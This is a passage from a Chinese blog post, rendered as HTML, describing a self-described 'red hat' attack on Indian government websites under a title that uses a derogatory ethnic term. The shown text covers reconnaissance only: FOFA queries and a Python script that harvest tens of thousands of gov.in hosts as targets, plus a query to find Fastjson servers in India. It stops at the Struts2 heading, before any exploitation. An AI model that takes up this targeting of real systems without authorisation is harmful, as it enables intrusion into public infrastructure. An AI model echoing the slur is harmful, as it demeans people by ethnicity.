<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo_32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo_16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"twe1v3.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本次渗透测试属于一个红帽性质的一次针对阿三的渗透攻击，群里大哥一声吆喝，小弟我直接第一个出击。">
<meta property="og:type" content="article">
<meta property="og:title" content="一次针对阿三的红帽渗透测试[getshell]">
<meta property="og:url" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/index.html">
<meta property="og:site_name" content="TWe1v3">
<meta property="og:description" content="本次渗透测试属于一个红帽性质的一次针对阿三的渗透攻击，群里大哥一声吆喝，小弟我直接第一个出击。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711021949594.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711022232842.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711024218564.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025300355.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025640689.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025838442.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711030506931.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711030808818.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711031350331.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711031634840.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025901659.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713175036472.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713175143564.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713220128955.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713180849084.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181156856.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181947756.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181823099.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713182926953.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183110423.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183406307.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183606528.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183513017.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719101927146.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102234003.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102331665.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102848788.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719103210432.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115129111.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115425835.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115817964.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230726182631855.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230726183935140.png">
<meta property="article:published_time" content="2023-07-10T18:07:37.000Z">
<meta property="article:modified_time" content="2023-07-28T07:20:59.480Z">
<meta property="article:author" content="TWe1v3">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711021949594.png">


<link rel="canonical" href="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":"","permalink":"http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/","path":"2023/07/一次针对阿三的红帽渗透测试-getshell/","title":"一次针对阿三的红帽渗透测试[getshell]"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>一次针对阿三的红帽渗透测试[getshell] | TWe1v3</title>
  





<script src="/lib/fireworks.js"></script>
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">TWe1v3</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>文章标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>文章分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>时间轴</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于TWe1v3</a></li><li class="menu-item menu-item-friendlink"><a href="/friendlink/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E6%AC%A1%E6%9A%B4%E9%9C%B2%E9%9D%A2%E5%85%A8%E5%BC%80%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95getshell"><span class="nav-number">1.</span> <span class="nav-text"> 一次暴露面全开的红帽渗透测试[getshell]</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E9%98%B6%E6%AE%B5"><span class="nav-number">1.1.</span> <span class="nav-text"> 0x01、信息收集阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="nav-number">1.2.</span> <span class="nav-text"> 0x02、漏洞探测及利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#struts2"><span class="nav-number">1.2.1.</span> <span class="nav-text"> Struts2：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#weblogic"><span class="nav-number">1.2.2.</span> <span class="nav-text"> Weblogic：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jenkins"><span class="nav-number">1.2.3.</span> <span class="nav-text"> Jenkins：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#apache-solr"><span class="nav-number">1.2.4.</span> <span class="nav-text"> Apache-Solr</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="nav-number">1.2.5.</span> <span class="nav-text"> 其他漏洞发现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss"><span class="nav-number">1.2.5.1.</span> <span class="nav-text"> 反射型XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.5.2.</span> <span class="nav-text"> SQL注入</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93"><span class="nav-number">1.3.</span> <span class="nav-text"> 渗透总结</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="TWe1v3"
      src="/images/twe1v3.jpg">
  <p class="site-author-name" itemprop="name">TWe1v3</p>
  <div class="site-description" itemprop="description">TWe1v3的博客</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">31</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">31</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/TWe1v3" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;TWe1v3" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:twe1v3@qq.com" title="E-Mail → mailto:twe1v3@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



        </div>
      </div>

    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://twe1v3.github.io/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/twe1v3.jpg">
      <meta itemprop="name" content="TWe1v3">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TWe1v3">
      <meta itemprop="description" content="TWe1v3的博客">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="一次针对阿三的红帽渗透测试[getshell] | TWe1v3">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一次针对阿三的红帽渗透测试[getshell]
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-07-11 02:07:37" itemprop="dateCreated datePublished" datetime="2023-07-11T02:07:37+08:00">2023-07-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-07-28 15:20:59" itemprop="dateModified" datetime="2023-07-28T15:20:59+08:00">2023-07-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.7k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>5 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>本次渗透测试属于一个红帽性质的一次针对阿三的渗透攻击，群里大哥一声吆喝，小弟我直接第一个出击。</p>
<span id="more"></span>
<h1 id="一次暴露面全开的红帽渗透测试getshell"><a class="markdownIt-Anchor" href="#一次暴露面全开的红帽渗透测试getshell"></a> 一次暴露面全开的红帽渗透测试[getshell]</h1>
<p>声明：本文章仅用作技术交流和技术分享，文中所涉及的任何内容与渗透技术被读者恶意使用所造成的后果与作者本人无关！</p>
<h2 id="0x01-信息收集阶段"><a class="markdownIt-Anchor" href="#0x01-信息收集阶段"></a> 0x01、信息收集阶段</h2>
<p>==注：本次信息收集过程主要使用FOFA网络探测平台 <a target="_blank" rel="noopener" href="https://fofa.info/===">https://fofa.info/===</a></p>
<p>一开始进行收集的时候，有点迷，直接进行了大面积的&quot;<a target="_blank" rel="noopener" href="http://gov.in">gov.in</a>&quot;域名收集</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">host=&quot;gov.in&quot; &amp;&amp; country=&quot;IN&quot;</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711021949594.png" alt="image-20230711021949594"></p>
<p>哈哈68465条数据，想想就起飞，但是有个问题来了，怎么下载到本地，高级用户的API也只能调用下载1w条数据，左思右想<img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711022232842.png" alt="image-20230711022232842"></p>
<p>试着写了个脚本看看：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pythonfofa</span><br><span class="line"><span class="keyword">import</span> csv</span><br><span class="line"></span><br><span class="line">filename = <span class="string">&quot;IN_domain.csv&quot;</span></span><br><span class="line"></span><br><span class="line">email = <span class="string">&#x27;u_mail&#x27;</span></span><br><span class="line">key = <span class="string">&#x27;u_API_KEY&#x27;</span></span><br><span class="line">search = pythonfofa.Client(email, key)</span><br><span class="line">get_data = search.search(<span class="string">&#x27;host=&quot;gov.in&quot; &amp;&amp; country=&quot;IN&quot;&#x27;</span>, size=<span class="number">70000</span>)</span><br><span class="line"><span class="comment"># print(get_data)</span></span><br><span class="line"></span><br><span class="line">requests = [result[<span class="number">1</span>] <span class="keyword">for</span> result <span class="keyword">in</span> get_data[<span class="string">&#x27;results&#x27;</span>]]</span><br><span class="line"><span class="built_in">print</span>(requests)</span><br><span class="line"><span class="comment"># 打开CSV文件并设置写入模式</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">&quot;w&quot;</span>, newline=<span class="string">&quot;&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    writer = csv.writer(file)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 遍历请求列表</span></span><br><span class="line">    <span class="keyword">for</span> request <span class="keyword">in</span> requests:</span><br><span class="line">        <span class="comment"># 在控制台打印域名</span></span><br><span class="line">        <span class="built_in">print</span>(request)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 检测域名是否包含&quot;http://&quot;</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> request.startswith(<span class="string">&quot;http://&quot;</span>) <span class="keyword">and</span> <span class="keyword">not</span> request.startswith(<span class="string">&quot;https://&quot;</span>):</span><br><span class="line">            <span class="comment"># 如果不包含，则在域名前添加&quot;http://&quot;</span></span><br><span class="line">            request = <span class="string">&quot;http://&quot;</span> + request</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 在域名后添加斜杠&quot;/&quot;</span></span><br><span class="line">        request += <span class="string">&quot;/&quot;</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># 将请求和值&quot;1&quot;作为一行写入CSV文件</span></span><br><span class="line">        writer.writerow([request, <span class="number">1</span>])</span><br></pre></td></tr></table></figure>
<p>是的，肯定不能跑，下断点，调试看看</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711024218564.png" alt="image-20230711024218564"></p>
<p>很好确实是不能直接干7w条，换个收集思路，收集主流框架进行相应的漏扫</p>
<p>主流框架的相关漏洞的FOFA规则语句：</p>
<p><strong>Fastjson</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app=&quot;Fastjson&quot; &amp;&amp; host=&quot;in&quot; &amp;&amp; country=&quot;IN&quot; &amp;&amp; status_code=&quot;200&quot; &amp;&amp; (port=&quot;80&quot; || port=&quot;443&quot;)</span><br></pre></td></tr></table></figure>
<p><strong>Struts2</strong></p>
